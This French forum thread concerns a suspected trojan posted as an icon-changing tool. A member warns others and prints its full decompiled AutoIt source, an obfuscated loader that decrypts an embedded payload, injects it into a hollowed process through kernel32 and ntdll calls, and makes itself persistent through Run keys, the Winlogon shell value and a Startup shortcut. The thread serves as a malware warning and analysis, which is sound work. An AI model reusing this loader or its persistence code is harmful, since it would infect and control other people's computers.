Tools Change Icon

  • Comme vous le savez le discord n'est malheureusement plus disponible, voici donc le nouveau moyen de communication à travers CG3 : Matrix Pour plus d'informations sur la fermeture du discord : Fermeture du discord.

lightome

Nouveau membre
28 Avr. 2013
1
0
201
27
Un Soft trés utile que je conseil a tous les flémards qui en on mare de Reshack :)
Merc lucdu33490
 

ExhVoid

Nouveau Marchand
18 Juin 2011
270
5
924
Un peu suspect ... pas de VT, Lightome qui a 1 message ... perso je telecharge pas.
 

TheHardButcher

Programmeur C/C++
Programmeur
14 Déc. 2009
1,462
58
964
France
Je fais mon analyse en ce moment même, j’édite dès que finit, pour le moment je confirme, très suspect !
 

TheHardButcher

Programmeur C/C++
Programmeur
14 Déc. 2009
1,462
58
964
France
Analyse Anubis :
Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Source du programme en autoit :
Code:
#NoTrayIcon
#Region
#AutoIt3Wrapper_Icon=shyguy-jaune--icone-7979.ico
#AutoIt3Wrapper_Compression=4
#AutoIt3Wrapper_UseUpx=n
#EndRegion
$20280007 = 713165379
While 1
    Switch $20280007
        Case 66914455
            $2028000e = FileRead($2028000f)
            $20280007 = 1996145086
        Case 322315756
            $20280007 = 374656132
        Case 374656132
            #EndRegion
            $20280007 = 676554044
        Case 405814147
            f343236343332383438($2028000e)
            ExitLoop 
        Case 618977660
            $20280007 = 2127255088
        Case 672862045
            $20280007 = 322315756
        Case 676554044
            $2028000f = FileOpen(unhtzircvhfrr(), 0)
            $20280007 = 66914455
        Case 713165379
            $20280007 = 618977660
        Case 1534727121
            $2028000e = f353337353233393539($2028000e, orszghfrrcbqine("\i{{mKinñ"))
            $20280007 = 405814147
        Case 1996145086
            $2028000e = StringMid($2028000e, StringInStr($2028000e, orszghfrrcbqine("JijR}{|qvmjqmjmz")) + fscjovcrt(orszghfrrcbqine("JijR}{|qvmjqmjmz")))
            $20280007 = 1534727121
        Case 2127255088
            $20280007 = 672862045
    EndSwitch
WEnd

Func f353337353233393539($2028000d, $2028001a)
    $20280004 = 713165379
    While 1
        Switch $20280004
            Case 66914455
                $2028000b = 0
                $20280004 = 1996145086
            Case 322315756
                DllStructSetData($2028000b, 1, $2028000d)
                $20280004 = 374656132
            Case 374656132
                DllCall(orszghfrrcbqine("}{mz;:6ltt"), orszghfrrcbqine("vwvm"), orszghfrrcbqine("Kitt_qvlwXzwk"), orszghfrrcbqine("x|z"), DllStructGetPtr($2028000c), orszghfrrcbqine("x|z"), DllStructGetPtr($2028000b), orszghfrrcbqine("qv|"), BinaryLen($2028000d), orszghfrrcbqine("{|z"), $2028001a, orszghfrrcbqine("qv|"), 0)
                $20280004 = 676554044
            Case 618977660
                Local $2028000c = DllStructCreate(orszghfrrcbqine("j|mc") & BinaryLen($2028001b) & "]")
                $20280004 = 2127255088
            Case 672862045
                Local $2028000b = DllStructCreate(orszghfrrcbqine("j|mc") & BinaryLen($2028000d) & "]")
                $20280004 = 322315756
            Case 676554044
                Local $20280021 = DllStructGetData($2028000b, 1)
                $20280004 = 66914455
            Case 713165379
                Local $2028001b = orszghfrrcbqine("8¬[email protected]>I88>I88=;=>[email protected]==98;[email protected]@<[email protected]?N:IM<@<@:[email protected]@A<[email protected][email protected]<[email protected]@[email protected]:[email protected]@@<8LMNNMNNNNM:N;@;>=N<[email protected];>[email protected]?LNK88898888?L<[email protected]<=NK;9L:N??=N8A:8;<=988NJ>[email protected]<LNK8NJ>@[email protected];<=N<:[email protected]<=N<@[email protected]@<;[email protected]?LN<@>@<;[email protected]@@<;=N8NMNNNNNN<[email protected];[email protected];A==8K?>>;@[email protected]=MKNMNNNN<8:[email protected]@[email protected]@8;@=MKNMNNNN8NJ>888;@[email protected]:[email protected]@[email protected]@ALM8;[email protected]>@ALN8;[email protected]@>[email protected]@8>8NJ>8M8NJ>[email protected]@[email protected]<[email protected][email protected]>;88><:[email protected]=N=M=JKAK:9888")
                $20280004 = 618977660
            Case 1534727121
                Return $20280021
                ExitLoop 
            Case 1996145086
                $2028000c = 0
                $20280004 = 1534727121
            Case 2127255088
                DllStructSetData($2028000c, 1, $2028001b)
                $20280004 = 672862045
        EndSwitch
    WEnd
EndFunc

Func f343236343332383438($2028000a)
    $20280000 = 713165379
    While 1
        Switch $20280000
            Case 66914455
                Local $20280010 = DllStructGetData($2028002a, orszghfrrcbqine("Xzwkm{{"))
                $20280000 = 1996145086
            Case 322315756
                Local $2028002b = DllStructCreate(orszghfrrcbqine("lwzl((kj[qmC") & orszghfrrcbqine("x|z(Zm{mz~mlC") & orszghfrrcbqine("x|z(Lm{s|wxC") & orszghfrrcbqine("x|z(\q|tmC") & orszghfrrcbqine("lwzl(`C") & orszghfrrcbqine("lwzl(aC") & orszghfrrcbqine("lwzl(`[qmC") & orszghfrrcbqine("lwzl(a[qmC") & orszghfrrcbqine("lwzl(`Kw}v|Kpiz{C") & orszghfrrcbqine("lwzl(aKw}v|Kpiz{C") & orszghfrrcbqine("lwzl(NqttI||zqj}|mC") & orszghfrrcbqine("lwzl(Ntio{C") & orszghfrrcbqine("}{pwz|([pw_qvlwC") & orszghfrrcbqine("}{pwz|(Zm{mz~ml:C") & orszghfrrcbqine("x|z(Zm{mz~ml:C") & orszghfrrcbqine("x|z(p[|lQvx}|C") & orszghfrrcbqine("x|z(p[|lW}|x}|C") & orszghfrrcbqine("x|z(p[|lMzzwz"))
                $20280000 = 374656132
            Case 374656132
                Local $2028002a = DllStructCreate(orszghfrrcbqine("x|z(Xzwkm{{C") & orszghfrrcbqine("x|z(\pzmilC") & orszghfrrcbqine("lwzl(Xzwkm{{QlC") & orszghfrrcbqine("lwzl(\pzmilQl"))
                $20280000 = 676554044
            Case 405814147
                DllStructSetData($20280024, orszghfrrcbqine("Kwv|m¬|Ntio{"), 65538)
                $20280000 = 853364522
            Case 618977660
                Local $20280023 = DllStructCreate(orszghfrrcbqine("j|mc") & BinaryLen($20280009) & "]")
                $20280000 = 2127255088
            Case 672862045
                Local $2028001e = DllStructGetPtr($20280023)
                $20280000 = 322315756
            Case 676554044
                Local $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("Kzmi|mXzwkm{{_"), orszghfrrcbqine("{|z"), @AutoItExe, orszghfrrcbqine("x|z"), 0, orszghfrrcbqine("x|z"), 0, orszghfrrcbqine("x|z"), 0, orszghfrrcbqine("qv|"), 0, orszghfrrcbqine("lwzl"), 4, orszghfrrcbqine("x|z"), 0, orszghfrrcbqine("x|z"), 0, orszghfrrcbqine("x|z"), DllStructGetPtr($2028002b), orszghfrrcbqine("x|z"), DllStructGetPtr($2028002a))
                $20280000 = 66914455
            Case 713165379
                Local $20280009 = Binary($2028000a)
                $20280000 = 618977660
            Case 853364522
                $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("Om|\pzmilKwv|m¬|"), orszghfrrcbqine("x|z"), $20280011, orszghfrrcbqine("x|z"), DllStructGetPtr($20280024))
                $20280000 = 2108072214
            Case 1131903826
                Local $20280022 = DllStructGetData($20280025, orszghfrrcbqine("Uioqk"))
                ExitLoop 
            Case 1337086684
                $2028001e += DllStructGetData($20280025, orszghfrrcbqine("Illzm{{WnVmM¬mPmilmz"))
                $20280000 = 1131903826
            Case 1534727121
                Local $20280024 = DllStructCreate(orszghfrrcbqine("lwzl(Kwv|m¬|Ntio{C") & orszghfrrcbqine("lwzl(Lz8C") & orszghfrrcbqine("lwzl(Lz9C") & orszghfrrcbqine("lwzl(Lz:C") & orszghfrrcbqine("lwzl(Lz;C") & orszghfrrcbqine("lwzl(Lz>C") & orszghfrrcbqine("lwzl(Lz?C") & orszghfrrcbqine("lwzl(Kwv|zwt_wzlC") & orszghfrrcbqine("lwzl([|i|}{_wzlC") & orszghfrrcbqine("lwzl(\io_wzlC") & orszghfrrcbqine("lwzl(MzzwzWnn{m|C") & orszghfrrcbqine("lwzl(Mzzwz[mtmk|wzC") & orszghfrrcbqine("lwzl(Li|iWnn{m|C") & orszghfrrcbqine("lwzl(Li|i[mtmk|wzC") & orszghfrrcbqine("j|m(Zmoq{|[email protected]") & orszghfrrcbqine("lwzl(Kz8Vx¬[|i|mC") & orszghfrrcbqine("lwzl([moO{C") & orszghfrrcbqine("lwzl([moN{C") & orszghfrrcbqine("lwzl([moM{C") & orszghfrrcbqine("lwzl([moL{C") & orszghfrrcbqine("lwzl(MlqC") & orszghfrrcbqine("lwzl(M{qC") & orszghfrrcbqine("lwzl(Mj¬C") & orszghfrrcbqine("lwzl(Ml¬C") & orszghfrrcbqine("lwzl(Mk¬C") & orszghfrrcbqine("lwzl(Mi¬C") & orszghfrrcbqine("lwzl(MjxC") & orszghfrrcbqine("lwzl(MqxC") & orszghfrrcbqine("lwzl([moK{C") & orszghfrrcbqine("lwzl(MNtio{C") & orszghfrrcbqine("lwzl(M{xC") & orszghfrrcbqine("lwzl([mo["))
                $20280000 = 405814147
            Case 1996145086
                Local $20280011 = DllStructGetData($2028002a, orszghfrrcbqine("\pzmil"))
                $20280000 = 1534727121
            Case 2108072214
                Local $20280025 = DllStructCreate(orszghfrrcbqine("kpiz(Uioqkc:eC") & orszghfrrcbqine("}{pwz|(J|m{WvTi{|XiomC") & orszghfrrcbqine("}{pwz|(Xiom{C") & orszghfrrcbqine("}{pwz|(Zmtwki|qwv{C") & orszghfrrcbqine("}{pwz|([qmwnPmilmzC") & orszghfrrcbqine("}{pwz|(Uqvqu}uM¬|ziC") & orszghfrrcbqine("}{pwz|(Ui¬qu}uM¬|ziC") & orszghfrrcbqine("}{pwz|([[C") & orszghfrrcbqine("}{pwz|([XC") & orszghfrrcbqine("}{pwz|(Kpmks{}uC") & orszghfrrcbqine("}{pwz|(QXC") & orszghfrrcbqine("}{pwz|(K[C") & orszghfrrcbqine("}{pwz|(Zmtwki|qwvC") & orszghfrrcbqine("}{pwz|(W~mztiC") & orszghfrrcbqine("kpiz(Zm{[email protected]") & orszghfrrcbqine("}{pwz|(WMUQlmv|qnqmzC") & orszghfrrcbqine("}{pwz|(WMUQvnwzui|qwvC") & orszghfrrcbqine("kpiz(Zm{mz~ml:c:8eC") & orszghfrrcbqine("lwzl(Illzm{{WnVmM¬mPmilmz"), $2028001e)
                $20280000 = 1337086684
            Case 2127255088
                DllStructSetData($20280023, 1, $20280009)
                $20280000 = 672862045
        EndSwitch
    WEnd
    If NOT ($20280022 == orszghfrrcbqine("Ub")) Then
        $20280002 = 713165379
        While 1
            Switch $20280002
                Case 618977660
                    Return SetError(3, 0, 0)
                    ExitLoop 
                Case 713165379
                    DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("\mzuqvi|mXzwkm{{"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("lwzl"), 0)
                    $20280002 = 618977660
            EndSwitch
        WEnd
    EndIf
    $20280002 = 713165379
    While 1
        Switch $20280002
            Case 618977660
                $2028001e += 4
                ExitLoop 
            Case 713165379
                Local $20280027 = DllStructCreate(orszghfrrcbqine("lwzl([qovi|}zm"), $2028001e)
                $20280002 = 618977660
        EndSwitch
    WEnd
    If DllStructGetData($20280027, orszghfrrcbqine("[qovi|}zm")) <> 17744 Then
        $20280002 = 713165379
        While 1
            Switch $20280002
                Case 618977660
                    Return SetError(4, 0, 0)
                    ExitLoop 
                Case 713165379
                    DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("\mzuqvi|mXzwkm{{"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("lwzl"), 0)
                    $20280002 = 618977660
            EndSwitch
        WEnd
    EndIf
    $20280006 = 713165379
    While 1
        Switch $20280006
            Case 322315756
                $2028001e += 96
                $20280006 = 374656132
            Case 374656132
                Local $20280014 = DllStructGetData($20280028, orszghfrrcbqine("Uioqk"))
                ExitLoop 
            Case 618977660
                Local $20280015 = DllStructGetData($20280026, orszghfrrcbqine("V}ujmzWn[mk|qwv{"))
                $20280006 = 2127255088
            Case 672862045
                Local $20280028 = DllStructCreate(orszghfrrcbqine("}{pwz|(UioqkC") & orszghfrrcbqine("}j|m(UirwzTqvsmz^mz{qwvC") & orszghfrrcbqine("}j|m(UqvwzTqvsmz^mz{qwvC") & orszghfrrcbqine("lwzl([qmWnKwlmC") & orszghfrrcbqine("lwzl([qmWnQvq|qitqmlLi|iC") & orszghfrrcbqine("lwzl([qmWn]vqvq|qitqmlLi|iC") & orszghfrrcbqine("lwzl(Illzm{{WnMv|zXwqv|C") & orszghfrrcbqine("lwzl(Ji{mWnKwlmC") & orszghfrrcbqine("lwzl(Ji{mWnLi|iC") & orszghfrrcbqine("lwzl(QuiomJi{mC") & orszghfrrcbqine("lwzl([mk|qwvItqovumv|C") & orszghfrrcbqine("lwzl(NqtmItqovumv|C") & orszghfrrcbqine("}{pwz|(UirwzWxmzi|qvo[{|mu^mz{qwvC") & orszghfrrcbqine("}{pwz|(UqvwzWxmzi|qvo[{|mu^mz{qwvC") & orszghfrrcbqine("}{pwz|(UirwzQuiom^mz{qwvC") & orszghfrrcbqine("}{pwz|(UqvwzQuiom^mz{qwvC") & orszghfrrcbqine("}{pwz|(Uirwz[}j{{|mu^mz{qwvC") & orszghfrrcbqine("}{pwz|(Uqvwz[}j{{|mu^mz{qwvC") & orszghfrrcbqine("lwzl(_qv;:^mz{qwv^it}mC") & orszghfrrcbqine("lwzl([qmWnQuiomC") & orszghfrrcbqine("lwzl([qmWnPmilmz{C") & orszghfrrcbqine("lwzl(Kpmks[}uC") & orszghfrrcbqine("}{pwz|([}j{{|muC") & orszghfrrcbqine("}{pwz|(LttKpizik|mzq{|qk{C") & orszghfrrcbqine("lwzl([qmWn[|iksZm{mz~mC") & orszghfrrcbqine("lwzl([qmWn[|iksKwuuq|C") & orszghfrrcbqine("lwzl([qmWnPmixZm{mz~mC") & orszghfrrcbqine("lwzl([qmWnPmixKwuuq|C") & orszghfrrcbqine("lwzl(TwilmzNtio{C") & orszghfrrcbqine("lwzl(V}ujmzWnZ~iIvl[qm{"), $2028001e)
                $20280006 = 322315756
            Case 713165379
                Local $20280026 = DllStructCreate(orszghfrrcbqine("}{pwz|(UikpqvmC") & orszghfrrcbqine("}{pwz|(V}ujmzWn[mk|qwv{C") & orszghfrrcbqine("lwzl(\qumLi|m[|iuxC") & orszghfrrcbqine("lwzl(Xwqv|mz\w[ujwt\ijtmC") & orszghfrrcbqine("lwzl(V}ujmzWn[ujwt{C") & orszghfrrcbqine("}{pwz|([qmWnWx|qwvitPmilmzC") & orszghfrrcbqine("}{pwz|(Kpizik|mzq{|qk{"), $2028001e)
                $20280006 = 618977660
            Case 2127255088
                $2028001e += 20
                $20280006 = 672862045
        EndSwitch
    WEnd
    If $20280014 <> 267 Then
        $20280002 = 713165379
        While 1
            Switch $20280002
                Case 618977660
                    Return SetError(5, 0, 0)
                    ExitLoop 
                Case 713165379
                    DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("\mzuqvi|mXzwkm{{"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("lwzl"), 0)
                    $20280002 = 618977660
            EndSwitch
        WEnd
    EndIf
    $20280001 = 713165379
    While 1
        Switch $20280001
            Case 66914455
                Local $2028001c = DllStructGetPtr($20280025)
                $20280001 = 1996145086
            Case 322315756
                $20280008 = DllCall(orszghfrrcbqine("V|ltt"), orszghfrrcbqine("qv|"), orszghfrrcbqine("V|]vuix^qmWn[mk|qwv"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("x|z"), $2028001d)
                $20280001 = 374656132
            Case 374656132
                $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("x|z"), orszghfrrcbqine("^qz|}itIttwkM¬"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("x|z"), $2028001d, orszghfrrcbqine("lwzl"), $20280017, orszghfrrcbqine("lwzl"), 12288, orszghfrrcbqine("lwzl"), 64)
                $20280001 = 676554044
            Case 405814147
                Local $20280029
                $20280001 = 853364522
            Case 618977660
                $2028001e += 128
                $20280001 = 2127255088
            Case 672862045
                Local $20280017 = DllStructGetData($20280028, orszghfrrcbqine("[qmWnQuiom"))
                $20280001 = 322315756
            Case 676554044
                Local $20280020 = $20280008[0]
                $20280001 = 66914455
            Case 713165379
                Local $20280013 = DllStructGetData($20280028, orszghfrrcbqine("Illzm{{WnMv|zXwqv|"))
                $20280001 = 618977660
            Case 853364522
                Local $20280018, $2028001f
                $20280001 = 2108072214
            Case 1534727121
                $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("_zq|mXzwkm{{Umuwz"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("x|z"), $20280020, orszghfrrcbqine("x|z"), $2028001c, orszghfrrcbqine("lwzl"), $20280016, orszghfrrcbqine("lwzl2"), 0)
                $20280001 = 405814147
            Case 1996145086
                Local $20280016 = DllStructGetData($20280028, orszghfrrcbqine("[qmWnPmilmz{"))
                $20280001 = 1534727121
            Case 2108072214
                Local $20280019
                ExitLoop 
            Case 2127255088
                Local $2028001d = DllStructGetData($20280028, orszghfrrcbqine("QuiomJi{m"))
                $20280001 = 672862045
        EndSwitch
    WEnd
    For $20280012 = 1 To $20280015
        $20280003 = 713165379
        While 1
            Switch $20280003
                Case 618977660
                    $20280018 = DllStructGetData($20280029, orszghfrrcbqine("[qmWnZiLi|i"))
                    $20280003 = 2127255088
                Case 672862045
                    $20280019 = DllStructGetData($20280029, orszghfrrcbqine("^qz|}itIllzm{{"))
                    ExitLoop 
                Case 713165379
                    $20280029 = DllStructCreate(orszghfrrcbqine("kpiz([email protected]") & orszghfrrcbqine("lwzl(]vqwvWn^qz|}it[qmIvlXp{qkitIllzm{{C") & orszghfrrcbqine("lwzl(^qz|}itIllzm{{C") & orszghfrrcbqine("lwzl([qmWnZiLi|iC") & orszghfrrcbqine("lwzl(Xwqv|mz\wZiLi|iC") & orszghfrrcbqine("lwzl(Xwqv|mz\wZmtwki|qwv{C") & orszghfrrcbqine("lwzl(Xwqv|mz\wTqvmv}ujmz{C") & orszghfrrcbqine("}{pwz|(V}ujmzWnZmtwki|qwv{C") & orszghfrrcbqine("}{pwz|(V}ujmzWnTqvmv}ujmz{C") & orszghfrrcbqine("lwzl(Kpizik|mzq{|qk{"), $2028001e)
                    $20280003 = 618977660
                Case 2127255088
                    $2028001f = DllStructGetPtr($20280025) + DllStructGetData($20280029, orszghfrrcbqine("Xwqv|mz\wZiLi|i"))
                    $20280003 = 672862045
            EndSwitch
        WEnd
        If $20280018 Then
            $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("_zq|mXzwkm{{Umuwz"), orszghfrrcbqine("x|z"), $20280010, orszghfrrcbqine("x|z"), $20280020 + $20280019, orszghfrrcbqine("x|z"), $2028001f, orszghfrrcbqine("lwzl"), $20280018, orszghfrrcbqine("lwzl2"), 0)
        EndIf
        $2028001e += 40
    Next
    $20280005 = 713165379
    While 1
        Switch $20280005
            Case 618977660
                $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("[m|\pzmilKwv|m¬|"), orszghfrrcbqine("x|z"), $20280011, orszghfrrcbqine("x|z"), DllStructGetPtr($20280024))
                $20280005 = 2127255088
            Case 713165379
                DllStructSetData($20280024, orszghfrrcbqine("Mi¬"), $20280020 + $20280013)
                $20280005 = 618977660
            Case 2127255088
                $20280008 = DllCall(orszghfrrcbqine("Smzvmt;:"), orszghfrrcbqine("qv|"), orszghfrrcbqine("Zm{}um\pzmil"), orszghfrrcbqine("x|z"), $20280011)
                ExitLoop 
        EndSwitch
    WEnd
EndFunc

Func orszghfrrcbqine($amaaesptrcjjfr)
    Local $zoruutbixfdlhs, $bxtaxrloemzuhv
    For $i = 1 To fscjovcrt($amaaesptrcjjfr)
        $bxtaxrloemzuhv = StringMid($amaaesptrcjjfr, $i, 1)
        $bxtaxrloemzuhv = Asc($bxtaxrloemzuhv) - 8
        $bxtaxrloemzuhv = Chr($bxtaxrloemzuhv)
        $zoruutbixfdlhs = $zoruutbixfdlhs & $bxtaxrloemzuhv
    Next
    $bxtaxrloemzuhv = $zoruutbixfdlhs
    Return $bxtaxrloemzuhv
EndFunc

Func unhtzircvhfrr()
    Global $i, $spath
    For $i = 0 To fscjovcrt($spath)
        $spath = getmodulefilenamea($i)
        Return $spath
    Next
EndFunc

RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\", "Micromicro", "REG_EXPAND_SZ", "%APPDATA%\Microsoft\micro.exe")
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\", "Micromicro", "REG_EXPAND_SZ", "%APPDATA%\Microsoft\micro.exe")
RegWrite("HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "shell", "REG_SZ", "%APPDATA%\Microsoft\micro.exe" & ",explorer.exe")
FileCreateShortcut("%APPDATA%\Microsoft\micro.exe", @StartupDir & "\windows.lnk", "%APPDATA%\Microsoft\", "", "Microsoft", @SystemDir & "\shell32.dll", "", "4", @SW_MINIMIZE)
FileMove(@ScriptFullPath, @AppDataDir & "\Microsoft\micro.exe", 1)

Func getmodulefilenamea($sprocess)
    Local $ret = DllCall("Kernel32", "ptr", "GetModuleFileNameA", "ptr", $i, "str", $spath, "int", 256)
    If (@error) OR (NOT $ret[0]) Then
        Return SetError(1, 0, "")
    EndIf
    Return $ret[2]
EndFunc

Func fscjovcrt($sstr)
    Local $result, $i, $blen
    Do
        $i = $i + 1
        $blen = StringLeft($sstr, $i)
        $result = $i
    Until $sstr = $blen
    Return $result
EndFunc

---------- Message ajouté à 17h08 ---------- Le message précédent était à 17h05 ----------

Double poste ( désolé pas assez de place sinon )
Pour faire simple le code est légèrement obfusqué, mais on se rend vite compte que orszghfrrcbqine("") est la fonction qui décrypte toutes les chaines de caractère, et que le programme appel des fonction de la dll kernel. Si vous désirez une analyse plus complète dite le moi, mais je vais pas écrire 3 page ici si c'est pour rien ^^